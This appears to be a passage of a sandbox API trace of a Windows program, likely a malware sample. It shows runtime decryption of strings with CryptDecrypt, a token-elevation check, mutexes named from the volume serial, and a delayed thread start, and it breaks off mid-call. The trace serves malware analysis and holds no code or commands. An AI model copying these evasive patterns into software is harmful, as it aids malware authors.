[0034.034] SetLastError (dwErrCode=0x0) [0034.034] GetLastError () returned 0x0 [0034.034] SetLastError (dwErrCode=0x0) [0034.034] GetLastError () returned 0x0 [0034.034] SetLastError (dwErrCode=0x0) [0034.034] GetLastError () returned 0x0 [0034.034] SetLastError (dwErrCode=0x0) [0034.034] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x26) returned 0x2a61768 [0034.034] GetLastError () returned 0x0 [0034.034] SetLastError (dwErrCode=0x0) [0034.034] GetLastError () returned 0x0 [0034.034] SetLastError (dwErrCode=0x0) [0034.034] GetLastError () returned 0x0 [0034.034] SetLastError (dwErrCode=0x0) [0034.034] GetLastError () returned 0x0 [0034.034] SetLastError (dwErrCode=0x0) [0034.034] GetLastError () returned 0x0 [0034.035] SetLastError (dwErrCode=0x0) [0034.035] GetLastError () returned 0x0 [0034.035] SetLastError (dwErrCode=0x0) [0034.035] GetLastError () returned 0x0 [0034.035] SetLastError (dwErrCode=0x0) [0034.035] GetLastError () returned 0x0 [0034.035] SetLastError (dwErrCode=0x0) [0034.035] GetLastError () returned 0x0 [0034.035] SetLastError (dwErrCode=0x0) [0034.035] GetLastError () returned 0x0 [0034.035] SetLastError (dwErrCode=0x0) [0034.035] GetLastError () returned 0x0 [0034.035] SetLastError (dwErrCode=0x0) [0034.035] GetLastError () returned 0x0 [0034.035] SetLastError (dwErrCode=0x0) [0034.035] GetLastError () returned 0x0 [0034.035] SetLastError (dwErrCode=0x0) [0034.035] GetLastError () returned 0x0 [0034.035] SetLastError (dwErrCode=0x0) [0034.035] GetLastError () returned 0x0 [0034.035] SetLastError (dwErrCode=0x0) [0034.035] GetLastError () returned 0x0 [0034.035] SetLastError (dwErrCode=0x0) [0034.035] GetLastError () returned 0x0 [0034.036] SetLastError (dwErrCode=0x0) [0034.036] GetLastError () returned 0x0 [0034.036] SetLastError (dwErrCode=0x0) [0034.036] GetLastError () returned 0x0 [0034.036] SetLastError (dwErrCode=0x0) [0034.036] GetLastError () returned 0x0 [0034.036] SetLastError (dwErrCode=0x0) [0034.036] GetLastError () returned 0x0 [0034.036] SetLastError (dwErrCode=0x0) [0034.036] GetLastError () returned 0x0 [0034.036] SetLastError (dwErrCode=0x0) [0034.036] GetLastError () returned 0x0 [0034.036] SetLastError (dwErrCode=0x0) [0034.036] GetLastError () returned 0x0 [0034.036] SetLastError (dwErrCode=0x0) [0034.036] GetLastError () returned 0x0 [0034.036] SetLastError (dwErrCode=0x0) [0034.036] GetLastError () returned 0x0 [0034.036] SetLastError (dwErrCode=0x0) [0034.036] GetLastError () returned 0x0 [0034.036] SetLastError (dwErrCode=0x0) [0034.036] GetLastError () returned 0x0 [0034.036] SetLastError (dwErrCode=0x0) [0034.036] GetLastError () returned 0x0 [0034.037] SetLastError (dwErrCode=0x0) [0034.037] GetLastError () returned 0x0 [0034.037] SetLastError (dwErrCode=0x0) [0034.037] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x94) returned 0x2a61798 [0034.037] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1f) returned 0x2a61838 [0034.037] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x28) returned 0x2a61860 [0034.037] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x37) returned 0x2a61890 [0034.037] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x3c) returned 0x2a618d0 [0034.037] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x31) returned 0x2a61918 [0034.037] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x14) returned 0x2a61958 [0034.037] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x24) returned 0x2a61978 [0034.037] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0xd) returned 0x2a619a8 [0034.037] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x17) returned 0x2a619c0 [0034.037] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x2b) returned 0x2a619e0 [0034.037] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x15) returned 0x2a61a18 [0034.037] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x17) returned 0x2a61a38 [0034.037] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x22) returned 0x2a61a58 [0034.037] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0xe) returned 0x2a61a88 [0034.037] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0xc1) returned 0x2a61aa0 [0034.037] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x3e) returned 0x2a61b70 [0034.037] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1b) returned 0x2a61bb8 [0034.037] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1d) returned 0x2a61be0 [0034.037] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x48) returned 0x2a61c08 [0034.037] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x12) returned 0x2a61c58 [0034.037] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x18) returned 0x2a61c78 [0034.037] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1b) returned 0x2a61c98 [0034.037] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x24) returned 0x2a61cc0 [0034.037] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x29) returned 0x2a61cf0 [0034.037] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a61d28 [0034.038] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x6b) returned 0x2a61d50 [0034.038] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x17) returned 0x2a61dc8 [0034.038] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0xf) returned 0x2a61de8 [0034.038] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x16) returned 0x2a61e00 [0034.038] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x28) returned 0x2a61e20 [0034.038] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x27) returned 0x2a61e50 [0034.038] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x12) returned 0x2a61e80 [0034.038] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x21) returned 0x2a61ea0 [0034.038] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x10) returned 0x2a61ed0 [0034.038] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1c) returned 0x2a61ee8 [0034.038] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x12) returned 0x2a61f10 [0034.038] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a60fd0 | out: hHeap=0x2a60000) returned 1 [0034.038] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0034.038] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x80) returned 0x2a61f30 [0034.038] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x9b81f6) returned 0x0 [0034.039] RtlSizeHeap (HeapHandle=0x2a60000, Flags=0x0, MemoryPointer=0x2a61f30) returned 0x80 [0034.039] GetLastError () returned 0x0 [0034.039] SetLastError (dwErrCode=0x0) [0034.039] GetLastError () returned 0x0 [0034.039] SetLastError (dwErrCode=0x0) [0034.039] GetLastError () returned 0x0 [0034.039] SetLastError (dwErrCode=0x0) [0034.039] GetLastError () returned 0x0 [0034.039] SetLastError (dwErrCode=0x0) [0034.039] GetLastError () returned 0x0 [0034.039] SetLastError (dwErrCode=0x0) [0034.039] GetLastError () returned 0x0 [0034.039] SetLastError (dwErrCode=0x0) [0034.039] GetLastError () returned 0x0 [0034.039] SetLastError (dwErrCode=0x0) [0034.039] GetLastError () returned 0x0 [0034.039] SetLastError (dwErrCode=0x0) [0034.039] GetLastError () returned 0x0 [0034.039] SetLastError (dwErrCode=0x0) [0034.040] GetLastError () returned 0x0 [0034.040] SetLastError (dwErrCode=0x0) [0034.040] GetLastError () returned 0x0 [0034.040] SetLastError (dwErrCode=0x0) [0034.040] GetLastError () returned 0x0 [0034.040] SetLastError (dwErrCode=0x0) [0034.040] GetLastError () returned 0x0 [0034.040] SetLastError (dwErrCode=0x0) [0034.040] GetLastError () returned 0x0 [0034.040] SetLastError (dwErrCode=0x0) [0034.040] GetLastError () returned 0x0 [0034.040] SetLastError (dwErrCode=0x0) [0034.040] GetLastError () returned 0x0 [0034.040] SetLastError (dwErrCode=0x0) [0034.040] GetLastError () returned 0x0 [0034.040] SetLastError (dwErrCode=0x0) [0034.040] GetLastError () returned 0x0 [0034.040] SetLastError (dwErrCode=0x0) [0034.040] GetLastError () returned 0x0 [0034.040] SetLastError (dwErrCode=0x0) [0034.040] GetLastError () returned 0x0 [0034.040] SetLastError (dwErrCode=0x0) [0034.040] GetLastError () returned 0x0 [0034.040] SetLastError (dwErrCode=0x0) [0034.041] GetLastError () returned 0x0 [0034.041] SetLastError (dwErrCode=0x0) [0034.041] GetLastError () returned 0x0 [0034.041] SetLastError (dwErrCode=0x0) [0034.041] GetLastError () returned 0x0 [0034.041] SetLastError (dwErrCode=0x0) [0034.041] GetLastError () returned 0x0 [0034.041] SetLastError (dwErrCode=0x0) [0034.041] GetLastError () returned 0x0 [0034.041] SetLastError (dwErrCode=0x0) [0034.041] GetLastError () returned 0x0 [0034.041] SetLastError (dwErrCode=0x0) [0034.041] GetLastError () returned 0x0 [0034.041] SetLastError (dwErrCode=0x0) [0034.041] GetLastError () returned 0x0 [0034.041] SetLastError (dwErrCode=0x0) [0034.041] GetLastError () returned 0x0 [0034.041] SetLastError (dwErrCode=0x0) [0034.041] GetLastError () returned 0x0 [0034.041] SetLastError (dwErrCode=0x0) [0034.041] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x30) returned 0x2a60fd0 [0034.041] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x2420) returned 0x2a61fb8 [0034.042] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x174) returned 0x2a61008 [0034.042] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a61188 [0034.042] CryptAcquireContextW (in: phProv=0x9bfcf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x9bfcf0*=0xf466e8) returned 1 [0034.463] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffc70, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffcd8 | out: phKey=0xcffcd8*=0xf592e8) returned 1 [0034.465] CryptSetKeyParam (hKey=0xf592e8, dwParam=0x1, pbData=0xcffcc0, dwFlags=0x0) returned 1 [0034.465] CryptDecrypt (in: hKey=0xf592e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61188, pdwDataLen=0xcffc8c | out: pbData=0x2a61188, pdwDataLen=0xcffc8c) returned 1 [0034.466] CryptDestroyKey (hKey=0xf592e8) returned 1 [0034.466] GetTickCount () returned 0x1eb26 [0034.466] GetLastError () returned 0x0 [0034.466] SetLastError (dwErrCode=0x0) [0034.466] GetLocaleInfoW (in: Locale=0x800, LCType=0x58, lpLCData=0xcffcfc, cchData=32 | out: lpLCData="\x03") returned 16 [0034.466] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1c) returned 0x2a611a0 [0034.467] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1c) returned 0x2a611c8 [0034.467] GetVersion () returned 0x23f00206 [0034.467] GetCurrentProcess () returned 0xffffffff [0034.467] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xcffce4 | out: TokenHandle=0xcffce4*=0x1f0) returned 1 [0034.467] GetTokenInformation (in: TokenHandle=0x1f0, TokenInformationClass=0x14, TokenInformation=0xcffcdc, TokenInformationLength=0x4, ReturnLength=0xcffce0 | out: TokenInformation=0xcffcdc, ReturnLength=0xcffce0) returned 1 [0034.467] CloseHandle (hObject=0x1f0) returned 1 [0034.467] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a611f0 [0034.467] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffbd8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc40 | out: phKey=0xcffc40*=0xf59368) returned 1 [0034.467] CryptSetKeyParam (hKey=0xf59368, dwParam=0x1, pbData=0xcffc28, dwFlags=0x0) returned 1 [0034.467] CryptDecrypt (in: hKey=0xf59368, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a611f0, pdwDataLen=0xcffbf4 | out: pbData=0x2a611f0, pdwDataLen=0xcffbf4) returned 1 [0034.467] CryptDestroyKey (hKey=0xf59368) returned 1 [0034.467] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a61218 [0034.467] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a61240 [0034.467] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a61268 [0034.467] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffbb0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc18 | out: phKey=0xcffc18*=0xf592e8) returned 1 [0034.467] CryptSetKeyParam (hKey=0xf592e8, dwParam=0x1, pbData=0xcffc00, dwFlags=0x0) returned 1 [0034.467] CryptDecrypt (in: hKey=0xf592e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61268, pdwDataLen=0xcffbcc | out: pbData=0x2a61268, pdwDataLen=0xcffbcc) returned 1 [0034.467] CryptDestroyKey (hKey=0xf592e8) returned 1 [0034.467] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61268 | out: hHeap=0x2a60000) returned 1 [0034.467] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a61218, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0034.467] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61240 | out: hHeap=0x2a60000) returned 1 [0034.467] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a611f0 | out: hHeap=0x2a60000) returned 1 [0034.467] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xcffc80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xcffc80*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0034.467] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61218 | out: hHeap=0x2a60000) returned 1 [0034.468] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a611f0 [0034.468] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffc0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc74 | out: phKey=0xcffc74*=0xf59168) returned 1 [0034.468] CryptSetKeyParam (hKey=0xf59168, dwParam=0x1, pbData=0xcffc5c, dwFlags=0x0) returned 1 [0034.468] CryptDecrypt (in: hKey=0xf59168, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a611f0, pdwDataLen=0xcffc28 | out: pbData=0x2a611f0, pdwDataLen=0xcffc28) returned 1 [0034.468] CryptDestroyKey (hKey=0xf59168) returned 1 [0034.468] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a61238 [0034.468] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x0 [0034.468] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\0115B419773000") returned 0x1f0 [0034.468] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x0) returned 0x0 [0034.468] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a611f0 | out: hHeap=0x2a60000) returned 1 [0034.468] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61238 | out: hHeap=0x2a60000) returned 1 [0034.468] ReleaseMutex (hMutex=0x1f0) returned 1 [0034.468] CloseHandle (hObject=0x1f0) returned 1 [0034.468] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a611f0 [0034.468] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffbec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc54 | out: phKey=0xcffc54*=0xf58ea8) returned 1 [0034.468] CryptSetKeyParam (hKey=0xf58ea8, dwParam=0x1, pbData=0xcffc3c, dwFlags=0x0) returned 1 [0034.468] CryptDecrypt (in: hKey=0xf58ea8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a611f0, pdwDataLen=0xcffc08 | out: pbData=0x2a611f0, pdwDataLen=0xcffc08) returned 1 [0034.468] CryptDestroyKey (hKey=0xf58ea8) returned 1 [0034.468] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a61218 [0034.468] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a61240 [0034.468] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a61268 [0034.468] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffbc4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc2c | out: phKey=0xcffc2c*=0xf58ce8) returned 1 [0034.468] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0xcffc14, dwFlags=0x0) returned 1 [0034.468] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61268, pdwDataLen=0xcffbe0 | out: pbData=0x2a61268, pdwDataLen=0xcffbe0) returned 1 [0034.468] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0034.468] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61268 | out: hHeap=0x2a60000) returned 1 [0034.468] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a61218, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0034.468] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61240 | out: hHeap=0x2a60000) returned 1 [0034.468] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a611f0 | out: hHeap=0x2a60000) returned 1 [0034.468] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xcffc94, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xcffc94*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0034.469] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61218 | out: hHeap=0x2a60000) returned 1 [0034.469] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a611f0 [0034.469] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffc20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc88 | out: phKey=0xcffc88*=0xf58ce8) returned 1 [0034.469] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0xcffc70, dwFlags=0x0) returned 1 [0034.469] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a611f0, pdwDataLen=0xcffc3c | out: pbData=0x2a611f0, pdwDataLen=0xcffc3c) returned 1 [0034.469] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0034.469] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a61238 [0034.469] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x0 [0034.469] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\0115B419773001") returned 0x1f0 [0034.469] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x0) returned 0x0 [0034.469] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a611f0 | out: hHeap=0x2a60000) returned 1 [0034.469] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61238 | out: hHeap=0x2a60000) returned 1 [0034.469] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x9b2019, lpParameter=0xcffd5c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x218 [0034.470] Sleep (dwMilliseconds=0x1388) [0039.490] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a611f0 [0039.490] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffbd8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc40 | out: phKey=0xcffc40*=0xf58ce8) returned 1 [0039.490] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0xcffc28, dwFlags=0x0) returned 1 [0039.490] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a611f0, pdwDataLen=0xcffbf4 | out: pbData=0x2a611f0, pdwDataLen=0xcffbf4) returned 1 [0039.490] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0039.490] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a61218 [0039.490] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a61240 [0039.490] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a61268 [0039.490] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffbb0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc18 | out: phKey=0xcffc18*=0xf590a8) returned 1 [0039.490] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0xcffc00, dwFlags=0x0) returned 1 [0039.490] CryptDecrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61268, pdwDataLen=0xcffbcc | out: pbData=0x2a61268, pdwDataLen=0xcffbcc) returned 1 [0039.490] CryptDestroyKey (hKey=0xf590a8) returned 1 [0039.490] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61268 | out: hHeap=0x2a60000) returned 1 [0039.490] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a61218, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0039.490] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61240 | out: hHeap=0x2a60000) returned 1 [0039.490] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a611f0 | out: hHeap=0x2a60000) returned 1 [0039.490] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xcffc80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xcffc80*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0039.491] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61218 | out: hHeap=0x2a60000) returned 1 [0039.491] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a611f0 [0039.491] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffc0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc74 | out: phKey=0xcffc74*=0xf590a8) returned 1 [0039.491] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0xcffc5c, dwFlags=0x0) returned 1 [0039.491] CryptDecrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a611f0, pdwDataLen=0xcffc28 | out: pbData=0x2a611f0, pdwDataLen=0xcffc28) returned 1 [0039.491] CryptDestroyKey (hKey=0xf590a8) returned 1 [0039.491] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a61238 [0039.491] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x220 [0039.491] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x0) returned 0x102 [0039.491] CloseHandle (hObject=0x220) returned 1 [0039.491] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a611f0 | out: hHeap=0x2a60000) returned 1 [0039.491] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61238 | out: hHeap=0x2a60000) returned 1 [0039.491] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x60) returned 0x2a611f0 [0039.491] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffc30, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc98 | out: phKey=0xcffc98*=0xf58e28) returned 1 [0039.491] CryptSetKeyParam (hKey=0xf58e28, dwParam=0x1, pbData=0xcffc80, dwFlags=0x0) returned 1 [0039.491] CryptDecrypt (in: hKey=0xf58e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a611f0, pdwDataLen=0xcffc4c | out: pbData=0x2a611f0, pdwDataLen=0xcffc4c) returned 1 [0039.491] CryptDestroyKey (hKey=0xf58e28) returned 1 [0039.491] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a61258 [0039.491] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffc08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc70 | out: phKey=0xcffc70*=0xf59168) returned 1 [0039.491] CryptSetKeyParam (hKey=0xf59168, dwParam=0x1, pbData=0xcffc58, dwFlags=0x0) returned 1 [0039.491] CryptDecrypt (in: hKey=0xf59168, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61258, pdwDataLen=0xcffc24 | out: pbData=0x2a61258, pdwDataLen=0xcffc24) returned 1 [0039.491] CryptDestroyKey (hKey=0xf59168) returned 1 [0039.491] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a61280 [0039.491] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a612a8 [0039.491] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a612d0 [0039.491] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffbe0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc48 | out: phKey=0xcffc48*=0xf58ce8) returned 1 [0039.491] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0xcffc30, dwFlags=0x0) returned 1 [0039.491] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a612d0, pdwDataLen=0xcffbfc | out: pbData=0x2a612d0, pdwDataLen=0xcffbfc) returned 1 [0039.491] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0039.492] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a612d0 | out: hHeap=0x2a60000) returned 1 [0039.492] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x2a61280, nSize=0xf | out: lpDst="") returned 0x1e [0039.492] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a612a8 | out: hHeap=0x2a60000) returned 1 [0039.492] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a61280, Size=0x3a) returned 0x2a61280 [0039.492] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x3a) returned 0x2a612c8 [0039.492] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a61310 [0039.492] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffbdc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc44 | out: phKey=0xcffc44*=0xf58ce8) returned 1 [0039.492] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0xcffc2c, dwFlags=0x0) returned 1 [0039.492] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61310, pdwDataLen=0xcffbf8 | out: 